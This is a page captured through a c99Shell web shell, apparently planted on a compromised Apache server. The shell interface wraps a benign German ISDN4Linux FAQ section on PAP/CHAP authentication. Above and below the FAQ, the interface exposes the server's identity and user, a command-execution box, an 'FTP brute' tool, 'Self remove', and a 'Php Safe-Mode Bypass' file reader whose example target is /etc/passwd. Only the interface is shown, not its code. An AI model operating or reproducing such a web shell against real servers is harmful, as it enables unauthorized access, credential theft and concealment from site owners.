!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/isdn4k-utils-3.2/   drwxr-xr-x
Free 52 GB of 127.8 GB (40.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     i4lfaq-de-12.html (4.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ISDN4LINUX - FAQ (deutsche Version): pap: Saubere Authentifikation (speziell mit PAP) Next Previous Contents

12. pap: Saubere Authentifikation (speziell mit PAP)

12.1 pap_optionauth: Beim Hinauswählen bekomme ich die Meldung 'pppd: peer authentication required but no authentication files accessible.' Was bedeutet das?

Wahrscheinlich wurde irrtümlich die Option 'auth' gesetzt. Dann muss sich die andere Seite authentifizieren.

12.2 pap_requestauth: Ich kann keine Verbindung aufbauen - sie wird von der anderen Seite abgelehnt. Im Logfile finde ich eine Meldung, ähnlich wie: 'sent (0) (LCP ConfReq id=0x1 mru 1500 auth pap magic 0xcd12e9c4'

Wie bei der letzten Frage wurde eine Option eingestellt, die verlangt, daß die andere Seite sich authentifiziert. Diese Optionen sollten vermieden werden. Mögliche Kandidaten sind: "+pap" und "+chap".

12.3 pap_rejectauth: Ich kann keine Verbindung aufbauen - sie wird von der Gegenseite abgewiesen. Im Logfile finde ich eine Meldung, ähnlich wie: 'sent (0) (LCP ConfRej id=0x1 auth pap'

Dein Computer lehnt es ab, sich mit Usernamen (z.B. XXX) und Password (z.B. YYY) zu identifizieren. Das funktioniert nur, wenn die Autorisierungsoptionen 'user XXX' und 'remotename YYY' für ipppd oder pppd richtig in einer korrekten (!) /etc/ppp/pap-secrets eingetragen sind. Mit einem Password ZZZ sollte des so aussehen:


XXX YYY ZZZ *

Wenn in XXX, YYY oder ZZZ spezielle Zeichen enthalten sind, solltest Du die Wörter in Anführungszeichen setzen. Wenn das nicht funktioniert, kannst Du Wildcards benutzen, etwa so:
* * ZZZ *

Dann hat jeder Benutzer das Password ZZZ. Wenn chap zur Autorisierung benötigt wird, muss /etc/ppp/chap-secrets korrekt eingestellt sein. Wichtig: das Format ist nicht das gleiche wie bei pap-secrets! Wichtig ist auf jeden Fall, zum Trennen von Username, Computer und Passwort nur den Tabulator und nicht die Leertaste zu verwenden.

Lies auf jeden Fall die READMEs oder schau Dir http://www.lrz-muenchen.de/~ui161ab/www/isdn/ an. Sieh Dir ebenfalls die nächste Frage pap_passwd an.

12.4 pap_checkpwd: Wie stelle ich fest, welches Password an die Gegenseite geschickt wird?

Nutze die Optionen debug und +pwlog für ipppd oder pppd. Dann kannst Du Dein Password im Logfile sehen.

12.5 pap_passwd: Ich habe Probleme mit der Authentifikation durch PAP oder CHAP. Sie schlägt fehl obwohl ich sicher bin, Password usw. korrekt eingetragen zu haben.

Stefan A. Mühlenweg Stefan.A.Muehlenweg@samhh.hanse.de schrieb am 4. Okt 1996:

Ich hatte genau das gleiche Problem / die gleiche Fehlermeldung. Der Grund dafür war, daß ich drei Einträge in chap-secrets / pap-secrets (für client, server, secret) aber keinen vierten Eintrag (IP Addresse) hatte. ABER: hinter dem dritten Eintrag kamen einige Leerzeichen. Nach dem Entfernen dieser Leerzeichen und/oder TABs ist der (i)pppd jetzt sehr zufrieden mit meinen Authentifizierungs-Dateien.
Eine weitere Problemquelle kann das Password selbst sein. Wenn es das Zeichen '#' enthält, wird alles Nachfolgende als Kommentar verstanden. Leerzeichen oder TABs können gleiche Probleme verursachen. Lösung: Setze das Password in Anführungszeichen!


Next Previous Contents

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0076 ]--